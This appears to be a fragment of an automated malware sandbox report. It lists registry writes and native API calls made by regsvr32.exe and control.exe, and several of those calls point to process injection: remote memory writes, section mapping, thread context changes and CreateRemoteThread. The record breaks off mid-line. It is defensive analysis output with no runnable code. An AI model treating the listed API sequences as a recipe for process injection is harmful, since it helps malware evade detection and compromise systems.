          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_008F34D0 NtMapViewOfSection,1_2_008F34D0
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_008F11A9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,1_2_008F11A9
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_008F4F73 GetProcAddress,NtCreateSection,memset,1_2_008F4F73
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_008FB159 NtQueryVirtualMemory,1_2_008FB159
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04315868 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,1_2_04315868
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_042FCCD9 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,1_2_042FCCD9
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_042FE529 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,1_2_042FE529
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04300D8D memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,1_2_04300D8D
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04305E21 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,1_2_04305E21
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04312AAC NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,1_2_04312AAC
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_042F5E8A NtQueryInformationProcess,1_2_042F5E8A
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_0430C6FE NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,1_2_0430C6FE
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_042FF314 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,1_2_042FF314
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_042F8F6D NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,1_2_042F8F6D
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_042F77B0 NtMapViewOfSection,1_2_042F77B0
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_0430FFF2 GetProcAddress,NtCreateSection,memset,1_2_0430FFF2
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_042FA818 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,1_2_042FA818
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_042F3934 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,1_2_042F3934
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04304518 NtGetContextThread,RtlNtStatusToDosError,1_2_04304518
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_043005FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,1_2_043005FC
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04312E10 NtQuerySystemInformation,RtlNtStatusToDosError,1_2_04312E10
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_042F2A0A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,1_2_042F2A0A
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_042FE6C4 memset,NtQueryInformationProcess,1_2_042FE6C4
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_043017CD memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,1_2_043017CD
          Source: C:\Windows\System32\control.exeCode function: 38_2_00DDF9A4 NtAllocateVirtualMemory,38_2_00DDF9A4
          Source: C:\Windows\System32\control.exeCode function: 38_2_00DDC130 NtWriteVirtualMemory,38_2_00DDC130
          Source: C:\Windows\System32\control.exeCode function: 38_2_00DC1A9C NtQueryInformationProcess,38_2_00DC1A9C
          Source: C:\Windows\System32\control.exeCode function: 38_2_00DC2BD8 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,38_2_00DC2BD8
          Source: C:\Windows\System32\control.exeCode function: 38_2_00DD9B4C NtQueryInformationProcess,38_2_00DD9B4C
          Source: C:\Windows\System32\control.exeCode function: 38_2_00DBC458 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,38_2_00DBC458
          Source: C:\Windows\System32\control.exeCode function: 38_2_00DD9584 NtReadVirtualMemory,38_2_00DD9584
          Source: C:\Windows\System32\control.exeCode function: 38_2_00DD1EEC NtCreateSection,38_2_00DD1EEC
          Source: C:\Windows\System32\control.exeCode function: 38_2_00DBF640 NtQueryInformationToken,NtQueryInformationToken,NtClose,38_2_00DBF640
          Source: C:\Windows\System32\control.exeCode function: 38_2_00DCEF14 NtMapViewOfSection,38_2_00DCEF14
          Source: C:\Windows\System32\control.exeCode function: 38_2_00DF1002 NtProtectVirtualMemory,NtProtectVirtualMemory,38_2_00DF1002
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_042F2410 CreateProcessAsUserW,1_2_042F2410
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_008F28E91_2_008F28E9
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_008FAF341_2_008FAF34
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_043048041_2_04304804
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_0431086C1_2_0431086C
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04313C5C1_2_04313C5C
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_0430BC931_2_0430BC93
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_043026781_2_04302678
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_043116691_2_04311669
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_042FC3071_2_042FC307
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_042FBBA11_2_042FBBA1
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_0430CFA31_2_0430CFA3
          Source: C:\Windows\System32\control.exeCode function: 38_2_00DC589038_2_00DC5890
          Source: C:\Windows\System32\control.exeCode function: 38_2_00DC6B8038_2_00DC6B80
          Source: C:\Windows\System32\control.exeCode function: 38_2_00DBC45838_2_00DBC458
          Source: C:\Windows\System32\control.exeCode function: 38_2_00DB78F038_2_00DB78F0
          Source: C:\Windows\System32\control.exeCode function: 38_2_00DDE09C38_2_00DDE09C
          Source: C:\Windows\System32\control.exeCode function: 38_2_00DC285438_2_00DC2854
          Source: C:\Windows\System32